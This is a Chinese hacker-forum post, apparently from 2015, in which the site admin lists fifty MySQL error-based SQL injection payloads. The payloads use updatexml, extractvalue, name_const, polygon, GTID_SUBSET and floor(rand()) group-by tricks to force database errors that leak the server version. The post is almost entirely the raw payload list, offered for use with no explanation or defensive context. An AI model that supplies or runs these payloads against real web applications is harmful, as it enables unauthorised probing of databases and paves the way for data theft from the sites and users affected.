搜索
中国白客联盟»论坛 Techniques SQL注入(SQL Injection) SQL error-based injection payloads
返回列表 发新帖
查看: 222|回复: 0

SQL error-based injection payloads

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-3-24 23:43:21 | 显示全部楼层 |阅读模式
  1. '-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#
  2. '=0 group by elt(rand(),version())having sum(0)#
  3. '-updatexml(0,repeat(version(),2),2)#
  4. '|polygon((select*from(select name_const(version(),1))x))#
  5. '--~(select*from(select@@version)f)#
  6. '|GTID_SUBSET(@@version,0)#
  7. '/(select*from(select+name_const(version(),1),name_const(version(),1))a)#
  8. '=0 group by elt(rand(),version())having min(0)#
  9. '/updatexml(0,repeat(version(),2),0)#
  10. '-polygon((select*from(select name_const(version(),1))o))#
  11. '/gtid_subset(@@version,0)#
  12. '|(select*from(select name_const(version(),1),name_const(version(),1))a)#
  13. '|updatexml(1,repeat(version(),2),1)#
  14. '<1 group by elt(rand(),version())having min(0)#
  15. '|polygon((select*from(select name_const(version(),1))p))#
  16. '|!(select*from(select@@version)x)-~0#
  17. 'or 1 group by concat(version(),floor(rand(0)*2)) having min(0)or''='
  18. ' and extractvalue(rand(0),concat(0x0a,version()))or''='
  19. '--~(select*from(select@@version)f)#
  20. '|(select!x-~0.FROM(select+version()x)f)#
  21. '|(select!x-~0.FROM(select@@version x)f)#
  22. 'UnIoN SeLeCt CoUnT(`TeXt`) FrOm test.news WhErE 1=1 GrOuP By CoNcAt(VeRsIoN(),FlOoR(RaNd(1337)*2)),'
  23. '-(select*from(select name_const(version(),1),name_const(version(),1))p)#
  24. '/updatexml(0,concat(0xa,version()),0)#
  25. '/updatexml(0,concat('$_',version()),0)#
  26. '-updatexml(1,concat('a=.',version()),1)#
  27. '-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)#
  28. '/polygon((select*from(select name_const(version(),1))o))#
  29. '-~(select*from(select@@version)x)*2#
  30. 1e308'*(select*from(select@@version)x)#
  31. '-(select~b*a*a*a from(select~0/.1 a,version()b)x)#
  32. '-GTID_SUBSET(@@version,0)#
  33. '|updatexml(1,concat('a=.',version()),1)#
  34. '|updatexml(0,concat('$_',version()),2)#
  35. '-updatexml(0,concat(0x1,version()),2)#
  36. '|updatexml(0,lpad(.1,350,hex(hex(version()))),1)#
  37. '|(~(select*from(select@@version)f)*2)#
  38. '|~(select*from(select@@version)x)*cast(1e99as decimal(65))#
  39. '||1 group by mid(version(),rand())having min(1)#
  40. '|UpdateXML(1,concat('/',version()),1)#
  41. '|UpdateXML(1,concat('$_',version()),1)#
  42. '|ExtractValue(1,concat('/a[x=y]',version()))#
  43. '|Polygon((select*from(select name_const(version(),1))b))#
  44. '|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)#
  45. '|(select-9223372036854775808-(x||1)FROM(select+version()x)z)#
  46. '|(select pow(2,~x)FROM(select+version()x)z)#
  47. '|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)#
  48. '|GTID_SUBSET(version(),0)#
  49. '||1 group by concat(left(version(),9),rand(0)|0) having max(0)#
  50. '-updatexml(1,concat('.a=a',version()),1)#
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表